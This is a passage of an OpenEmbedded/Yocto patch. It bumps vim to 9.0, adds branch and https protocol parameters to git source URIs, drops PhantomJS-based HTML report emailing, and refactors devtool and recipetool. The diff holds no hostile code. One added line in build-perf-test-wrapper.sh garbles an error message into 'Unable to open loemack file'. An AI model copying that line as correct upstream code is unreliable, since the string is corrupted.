+LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
-SRC_URI = "git://github.com/vim/vim.git \
+SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
file://disable_acl_header_check.patch \
file://vim-add-knob-whether-elf.h-are-checked.patch \
file://0001-src-Makefile-improve-reproducibility.patch \
file://no-path-adjust.patch \
-"
-SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44"
+ "
+
+PV .= ".2190"
+SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
# Do not consider .z in x.y.z, as that is updated with every commit
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
+# Ignore that the upstream version .z in x.y.z is always newer
+UPSTREAM_VERSION_UNKNOWN = "1"
S = "${WORKDIR}/git"
VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
-inherit autotools-brokensep update-alternatives mime-xdg
+inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
CLEANBROKEN = "1"
@@ -31,29 +40,24 @@ do_configure () {
cd src
rm -f auto/*
touch auto/config.mk
+ # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
+ touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
+ # ru.cp1251.po uses CP1251 rather than cp1251, fix that
+ sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
aclocal
autoconf
cd ..
oe_runconf
touch src/auto/configure
touch src/auto/config.mk src/auto/config.h
+ # need a native tool, not a target one
+ ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
}
-do_compile() {
- # We do not support fully / correctly the following locales. Attempting
- # to use these with msgfmt in order to update the ".desktop" files exposes
- # this problem and leads to the compile failing.
- for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
- echo -n > src/po/${LOCALE}.po
- done
- autotools_do_compile
-}
-
-#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
-PACKAGECONFIG ??= ""
-PACKAGECONFIG += " \
+PACKAGECONFIG ??= "\
${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
+ nls \
"
PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -62,14 +66,18 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
+PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
EXTRA_OECONF = " \
--disable-gpm \
--disable-gtktest \
--disable-xim \
--disable-netbeans \
+ --disable-desktop-database-update \
--with-tlib=ncurses \
+ --with-modified-by='${MAINTAINER}' \
ac_cv_small_wchar_t=no \
+ ac_cv_path_GLIB_COMPILE_RESOURCES=no \
vim_cv_getcwd_broken=no \
vim_cv_memmove_handles_overlap=yes \
vim_cv_stat_ignores_slash=no \
@@ -80,6 +88,11 @@ EXTRA_OECONF = " \
STRIP=/bin/true \
"
+# Some host distros don't have it, disable consistently
+# also disable on dunfell target builds
+EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
+EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Virtual terminal emulator GTK+ widget library"
+DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
# Edit the recipes
$ bitbake-whatchanged core-image-sato
-The changes will be printed"
+The changes will be printed.
Note:
The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
import sys
import os
import argparse
-from distutils.version import LooseVersion
# Ensure PythonGit is installed (buildhistory_analysis needs it)
try:
@@ -71,10 +70,6 @@ def main():
parser = get_args_parser()
args = parser.parse_args()
- if LooseVersion(git.__version__) < '0.3.1':
- sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
- sys.exit(1)
-
if len(args.revisions) > 2:
sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
exit 1
fi
-if [ -n "$email_to" ]; then
- if ! [ -x "$(command -v phantomjs)" ]; then
- echo "ERROR: Sending email needs phantomjs."
- exit 1
- fi
- if ! [ -x "$(command -v optipng)" ]; then
- echo "ERROR: Sending email needs optipng."
- exit 1
- fi
-fi
-
# Open a file descriptor for flock and acquire lock
LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
if ! exec 3> "$LOCK_FILE"; then
- echo "ERROR: Unable to open lock file"
+ echo "ERROR: Unable to open loemack file"
exit 1
fi
if ! flock -n 3; then
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
if [ -n "$email_to" ]; then
echo "Emailing test report"
os_name=`get_os_release_var PRETTY_NAME`
- "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
+ "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
fi
# Upload report files, unless we're on detached head
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+#
+# Conversion script to update SRC_URI to add branch to git urls
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import re
+import os
+import sys
+import tempfile
+import shutil
+import mimetypes
+
+if len(sys.argv) < 2:
+ print("Please specify a directory to run the conversion script against.")
+ sys.exit(1)
+
+def processfile(fn):
+ def matchline(line):
+ if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
+ return False
+ return True
+ print("processing file '%s'" % fn)
+ try:
+ if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
+ return
+ fh, abs_path = tempfile.mkstemp()
+ modified = False
+ with os.fdopen(fh, 'w') as new_file:
+ with open(fn, "r") as old_file:
+ for line in old_file:
+ if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
+ if line.endswith('"\n'):
+ line = line.replace('"\n', ';branch=master"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';branch=master \\\n')
+ modified = True
+ if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
+ if "protocol=git" in line:
+ line = line.replace('protocol=git', 'protocol=https')
+ elif line.endswith('"\n'):
+ line = line.replace('"\n', ';protocol=https"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';protocol=https \\\n')
+ modified = True
+ new_file.write(line)
+ if modified:
+ shutil.copymode(fn, abs_path)
+ os.remove(fn)
+ shutil.move(abs_path, fn)
+ except UnicodeDecodeError:
+ pass
+
+ourname = os.path.basename(sys.argv[0])
+ourversion = "0.1"
+
+if os.path.isfile(sys.argv[1]):
+ processfile(sys.argv[1])
+ sys.exit(0)
+
+for targetdir in sys.argv[1:]:
+ print("processing directory '%s'" % targetdir)
+ for root, dirs, files in os.walk(targetdir):
+ for name in files:
+ if name == ourname:
+ continue
+ fn = os.path.join(root, name)
+ if os.path.islink(fn):
+ continue
+ if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
+ continue
+ processfile(fn)
+
+print("All files processed with version %s" % ourversion)
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
-echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"Commercial\""
+echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
for pkg in `bitbake -s | awk '{ print \$1 }'`; do
if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
import subprocess
import sys
import tempfile
-from email.mime.image import MIMEImage
-from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
log = logging.getLogger('oe-build-perf-report')
-# Find js scaper script
-SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
- 'scrape-html-report.js')
-if not os.path.isfile(SCRAPE_JS):
- log.error("Unableto find oe-build-perf-report-scrape.js")
- sys.exit(1)
-
-
-class ReportError(Exception):
- """Local errors"""
- pass
-
-
-def check_utils():
- """Check that all needed utils are installed in the system"""
- missing = []
- for cmd in ('phantomjs', 'optipng'):
- if not shutil.which(cmd):
- missing.append(cmd)
- if missing:
- log.error("The following tools are missing: %s", ' '.join(missing))
- sys.exit(1)
-
-
def parse_args(argv):
"""Parse command line arguments"""
description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
"the email parts")
parser.add_argument('--text',
help="Plain text message")
- parser.add_argument('--html',
- help="HTML peport generated by oe-build-perf-report")
- parser.add_argument('--phantomjs-args', action='append',
- help="Extra command line arguments passed to PhantomJS")
args = parser.parse_args(argv)
- if not args.html and not args.text:
- parser.error("Please specify --html and/or --text")
+ if not args.text:
+ parser.error("Please specify --text")
return args
-def decode_png(infile, outfile):
- """Parse/decode/optimize png data from a html element"""
- with open(infile) as f:
- raw_data = f.read()
-
- # Grab raw base64 data
- b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
- b64_data = re.sub('">.+$', '', b64_data, 1)
-
- # Replace file with proper decoded png
- with open(outfile, 'wb') as f:
- f.write(base64.b64decode(b64_data))
-
- subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
-
-
-def mangle_html_report(infile, outfile, pngs):
- """Mangle html file into a email compatible format"""
- paste = True
- png_dir = os.path.dirname(outfile)
- with open(infile) as f_in:
- with open(outfile, 'w') as f_out:
- for line in f_in.readlines():
- stripped = line.strip()
- # Strip out scripts
- if stripped == '<!--START-OF-SCRIPTS-->':
- paste = False
- elif stripped == '<!--END-OF-SCRIPTS-->':
- paste = True
- elif paste:
- if re.match('^.+href="data:image/png;base64', stripped):
- # Strip out encoded pngs (as they're huge in size)
- continue
- elif 'www.gstatic.com' in stripped:
- # HACK: drop references to external static pages
- continue
-
- # Replace charts with <img> elements
- match = re.match('<div id="(?P<id>\w+)"', stripped)
- if match and match.group('id') in pngs:
- f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
- else:
- f_out.write(line)
-
-
-def scrape_html_report(report, outdir, phantomjs_extra_args=None):
- """Scrape html report into a format sendable by email"""
- tmpdir = tempfile.mkdtemp(dir='.')
- log.debug("Using tmpdir %s for phantomjs output", tmpdir)
-
- if not os.path.isdir(outdir):
- os.mkdir(outdir)
- if os.path.splitext(report)[1] not in ('.html', '.htm'):
- raise ReportError("Invalid file extension for report, needs to be "
- "'.html' or '.htm'")
-
- try:
- log.info("Scraping HTML report with PhangomJS")
- extra_args = phantomjs_extra_args if phantomjs_extra_args else []
- subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
- [SCRAPE_JS, report, tmpdir],
- stderr=subprocess.STDOUT)
-
- pngs = []
- images = []
- for fname in os.listdir(tmpdir):
- base, ext = os.path.splitext(fname)
- if ext == '.png':
- log.debug("Decoding %s", fname)
- decode_png(os.path.join(tmpdir, fname),
- os.path.join(outdir, fname))
- pngs.append(base)
- images.append(fname)
- elif ext in ('.html', '.htm'):
- report_file = fname
- else:
- log.warning("Unknown file extension: '%s'", ext)
- #shutil.move(os.path.join(tmpdir, fname), outdir)
-
- log.debug("Mangling html report file %s", report_file)
- mangle_html_report(os.path.join(tmpdir, report_file),
- os.path.join(outdir, report_file), pngs)
- return (os.path.join(outdir, report_file),
- [os.path.join(outdir, i) for i in images])
- finally:
- shutil.rmtree(tmpdir)
-
-def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
- blind_copy=[]):
- """Send email"""
+def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
# Generate email message
- text_msg = html_msg = None
- if text_fn:
- with open(text_fn) as f:
- text_msg = MIMEText("Yocto build performance test report.\n" +
- f.read(), 'plain')
- if html_fn:
- html_msg = msg = MIMEMultipart('related')
- with open(html_fn) as f:
- html_msg.attach(MIMEText(f.read(), 'html'))
- for img_fn in image_fns:
- # Expect that content id is same as the filename
- cid = os.path.splitext(os.path.basename(img_fn))[0]
- with open(img_fn, 'rb') as f:
- image_msg = MIMEImage(f.read())
- image_msg['Content-ID'] = '<{}>'.format(cid)
- html_msg.attach(image_msg)
-
- if text_msg and html_msg:
- msg = MIMEMultipart('alternative')
- msg.attach(text_msg)
- msg.attach(html_msg)
- elif text_msg:
- msg = text_msg
- elif html_msg:
- msg = html_msg
- else:
- raise ReportError("Neither plain text nor html body specified")
+ with open(text_fn) as f:
+ msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
pw_data = pwd.getpwuid(os.getuid())
full_name = pw_data.pw_gecos.split(',')[0]
@@ -234,8 +90,6 @@ def main(argv=None):
if args.debug:
log.setLevel(logging.DEBUG)
- check_utils()
-
if args.outdir:
outdir = args.outdir
if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
try:
log.debug("Storing email parts in %s", outdir)
- html_report = images = None
- if args.html:
- html_report, images = scrape_html_report(args.html, outdir,
- args.phantomjs_args)
-
if args.to:
log.info("Sending email to %s", ', '.join(args.to))
if args.cc:
log.info("Copying to %s", ', '.join(args.cc))
if args.bcc:
log.info("Blind copying to %s", ', '.join(args.bcc))
- send_email(args.text, html_report, images, args.subject,
- args.to, args.cc, args.bcc)
+ send_email(args.text, args.subject, args.to, args.cc, args.bcc)
except subprocess.CalledProcessError as err:
log.error("%s, with output:\n%s", str(err), err.output.decode())
return 1
- except ReportError as err:
- log.error(err)
- return 1
finally:
if not args.outdir:
log.debug("Wiping %s", outdir)
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
REMOTE_URL=${REMOTE_URL%.git}
REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
-REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#")
+REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
if [ -z "$BRANCH" ]; then
BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'git' that doesn't think we are root
+
+import os
+import shutil
+import sys
+
+os.environ['PSEUDO_UNLOAD'] = '1'
+
+# calculate path to the real 'git'
+path = os.environ['PATH']
+# we need to remove our path but also any other copy of this script which
+# may be present, e.g. eSDK.
+replacements = [os.path.dirname(sys.argv[0])]
+for p in path.split(":"):
+ if p.endswith("/scripts"):
+ replacements.append(p)
+for r in replacements:
+ path = path.replace(r, '/ignoreme')
+real_git = shutil.which('git', path=path)
+
+if len(sys.argv) == 1:
+ os.execl(real_git, 'git')
+
+os.execv(real_git, sys.argv)
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
import logging
import os
import re
-from collections import namedtuple,OrderedDict
+from collections import namedtuple
from statistics import mean
@@ -238,7 +238,7 @@ class BuildStats(dict):
subdirs = os.listdir(path)
for dirname in subdirs:
recipe_dir = os.path.join(path, dirname)
- if not os.path.isdir(recipe_dir):
+ if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
continue
name, epoch, version, revision = cls.split_nevr(dirname)
bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
return layers
-def _find_layer_depends(depend, layers):
+def _find_layer(depend, layers):
for layer in layers:
if 'collections' not in layer:
continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
return layer
return None
-def add_layer_dependencies(bblayersconf, layer, layers, logger):
+def get_layer_dependencies(layer, layers, logger):
def recurse_dependencies(depends, layer, layers, logger, ret = []):
logger.debug('Processing dependencies %s for layer %s.' % \
(depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
if depend == 'core':
continue
- layer_depend = _find_layer_depends(depend, layers)
+ layer_depend = _find_layer(depend, layers)
if not layer_depend:
logger.error('Layer %s depends on %s and isn\'t found.' % \
(layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
# Note: [] (empty) is allowed, None is not!
+ return layer_depends
+
+def add_layer_dependencies(bblayersconf, layer, layers, logger):
+
+ layer_depends = get_layer_dependencies(layer, layers, logger)
if layer_depends is None:
return False
else:
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
# The top-level README file may have a suffix (like README.rst or README.txt).
readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
self.assertTrue(len(readme_files) > 0,
- msg="Layer doesn't contains README file.")
+ msg="Layer doesn't contain a README file.")
# There might be more than one file matching the file pattern above
# (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
if args.strip and not args.dry_run:
# Fakeroot copy to new destination
srcdir = recipe_outdir
- recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped')
+ recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
if os.path.isdir(recipe_outdir):
- bb.utils.remove(recipe_outdir, True)
+ exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
print(' %s' % item)
return 0
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
elif not args.recipename and not args.all:
raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
return 1
check_workspace_recipe(workspace, args.component)
- pn = rd.getVar('PN', True)
+ pn = rd.getVar('PN')
if not rd.getVarFlag('do_menuconfig','task'):
raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index d140b97de1..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
bb.utils.mkdirhier(dst_d)
shutil.move(src, dst)
-def _copy_file(src, dst, dry_run_outdir=None):
+def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
"""Copy a file. Creates all the directory components of destination path."""
dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -474,7 +474,11 @@ def symlink_oelocal_files_srctree(rd,srctree):
destpth = os.path.join(srctree, relpth, fn)
if os.path.exists(destpth):
os.unlink(destpth)
- os.symlink('oe-local-files/%s' % fn, destpth)
+ if relpth != '.':
+ back_relpth = os.path.relpath(local_files_dir, root)
+ os.symlink('%s/oe-local-files/%s/%s' % (back_relpth, relpth, fn), destpth)
+ else:
+ os.symlink('oe-local-files/%s' % fn, destpth)
addfiles.append(os.path.join(relpth, fn))
if addfiles:
bb.process.run('git add %s' % ' '.join(addfiles), cwd=srctree)
@@ -531,7 +535,6 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
initial_rev = None
- appendexisted = False
recipefile = d.getVar('FILE')
appendfile = recipe_to_append(recipefile, config)
is_kernel_yocto = bb.data.inherits_class('kernel-yocto', d)
@@ -590,6 +593,16 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
else:
task = 'do_patch'
+ if 'noexec' in (d.getVarFlags(task, False) or []) or 'task' not in (d.getVarFlags(task, False) or []):
+ logger.info('The %s recipe has %s disabled. Running only '
+ 'do_configure task dependencies' % (pn, task))
+
+ if 'depends' in d.getVarFlags('do_configure', False):
+ pn = d.getVarFlags('do_configure', False)['depends']
+ pn = pn.replace('${PV}', d.getVar('PV'))
+ pn = pn.replace('${COMPILERDEP}', d.getVar('COMPILERDEP'))
+ task = None
+
# Run the fetch + unpack tasks
res = tinfoil.build_targets(pn,
task,
@@ -601,6 +614,17 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
if not res:
raise DevtoolError('Extracting source for %s failed' % pn)
+ if not is_kernel_yocto and ('noexec' in (d.getVarFlags('do_patch', False) or []) or 'task' not in (d.getVarFlags('do_patch', False) or [])):
+ workshareddir = d.getVar('S')
+ if os.path.islink(srctree):
+ os.unlink(srctree)
+
+ os.symlink(workshareddir, srctree)
+
+            # The initial_rev file is created by the devtool_post_unpack function, which will not be executed if
+            # the do_unpack/do_patch tasks are disabled, so we have to report directly that source extraction succeeded
+ return True, True
+
try:
with open(os.path.join(tempdir, 'initial_rev'), 'r') as f:
initial_rev = f.read()
@@ -848,10 +872,11 @@ def modify(args, config, basepath, workspace):
if not initial_rev:
return 1
logger.info('Source tree extracted to %s' % srctree)
- # Get list of commits since this revision
- (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
- commits = stdout.split()
- check_commits = True
+ if os.path.exists(os.path.join(srctree, '.git')):
+ # Get list of commits since this revision
+ (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
+ commits = stdout.split()
+ check_commits = True
else:
if os.path.exists(os.path.join(srctree, '.git')):
# Check if it's a tree previously extracted by us. This is done
@@ -928,12 +953,17 @@ def modify(args, config, basepath, workspace):
if bb.data.inherits_class('kernel', rd):
f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
- 'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n')
+ 'do_fetch do_unpack do_kernel_configcheck"\n')
f.write('\ndo_patch[noexec] = "1"\n')
f.write('\ndo_configure_append() {\n'
' cp ${B}/.config ${S}/.config.baseline\n'
' ln -sfT ${B}/.config ${S}/.config.new\n'
'}\n')
+ f.write('\ndo_kernel_configme_prepend() {\n'
+ ' if [ -e ${S}/.config ]; then\n'
+ ' mv ${S}/.config ${S}/.config.old\n'
+ ' fi\n'
+ '}\n')
if rd.getVarFlag('do_menuconfig','task'):
f.write('\ndo_configure_append() {\n'
' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
if args.binary:
# Assume the archive contains the directory structure verbatim
# so we need to extract to a subdirectory
- fetchuri += ';subdir=${BP}'
+ fetchuri += ';subdir=${BPN}'
srcuri = fetchuri
rev_re = re.compile(';rev=([^;]+)')
res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
storeTagName = params['tag']
params['nobranch'] = '1'
del params['tag']
+ # Assume 'master' branch if not set
+ if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
+ params['branch'] = 'master'
fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
# Remove HEAD reference point and drop remote prefix
get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
if 'master' in get_branch:
- # If it is master, we do not need to append 'branch=master' as this is default.
# Even with the case where get_branch has multiple objects, if 'master' is one
# of them, we should default take from 'master'
- srcbranch = ''
+ srcbranch = 'master'
elif len(get_branch) == 1:
# If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
# Since we might have a value in srcbranch, we need to
# recontruct the srcuri to include 'branch' in params.
scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
- if srcbranch:
- params['branch'] = srcbranch
+ if scheme in ['git', 'gitsm']:
+ params['branch'] = srcbranch or 'master'
if storeTagName and scheme in ['git', 'gitsm']:
# Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
splitline = line.split()
if len(splitline) > 1:
if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
- srcuri = reformat_git_uri(splitline[1])
+ srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
srcsubdir = 'git'
break
@@ -743,6 +745,10 @@ def create_recipe(args):
for handler in handlers:
handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
+ # native and nativesdk classes are special and must be inherited last
+ # If present, put them at the end of the classes list
